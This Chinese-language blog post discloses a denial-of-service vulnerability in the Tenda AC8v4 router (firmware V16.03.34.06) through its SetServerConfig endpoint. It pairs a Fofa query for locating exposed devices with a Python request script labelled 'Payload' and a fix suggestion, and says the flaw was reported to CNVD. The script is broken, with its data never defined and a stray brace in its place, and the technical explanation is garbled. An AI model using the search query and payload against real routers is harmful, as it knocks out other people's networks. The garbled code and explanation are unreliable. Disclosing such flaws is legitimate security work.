腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报

053
漏洞名称: 腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报
漏洞描述: Fofa语法

body=”tenda” && body=”V16.03.34.06″
风险程度: 高危
企业名称: 深圳市吉祥腾达科技有限公司
官网地址: https://www.tenda.com.cn
漏洞位置: http://192.168.25.135/goform/SetServerConfig
漏洞证明: 路由器固件下载:https://www.tenda.com.cn/download/detail-3506.html

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图

漏洞复现视频:

链接:https://pan.baidu.com/s/1aZhcBD_aXEWaTGvPbzeLRA

提取码:cpip

–来自百度网盘超级会员V4的分享

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图1

漏洞点发生在formSetServerConfig函数处

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图2

程序获取了用户输入的参数”HTTP/1.0 200 OK”,然后将用户的输入传入了websDone函数里,这个函数会处理用户输入的字符,如果输入的值过大处理不过来了

Payload:

import requests

url = “http://192.168.25.135/goform/SetServerConfig”

}

requests.post(url=url,data=data)

# 复现

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图3

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图4

运行脚本

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图5

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图6

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图7

路由器死机,网站也无法访问
修复建议 1.用户输入过大时,不接受输入
影响资产: AC8v4 V16.03.34.06
目前已上传cnvd

腾达路由器腾达路由器AC8v4 V16.03.34.06存在DOS漏洞合并上报插图8

 

© 版权声明
文章全是本幻城写的,尽量别直接复制粘贴
THE END
网络空间安全
喜欢就亲吻一下吧
分享
相关推荐
评论 抢沙发
头像
评论一下幻城的文章吧
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
代码

请输入代码:

确认
图片
    blank

    暂无评论内容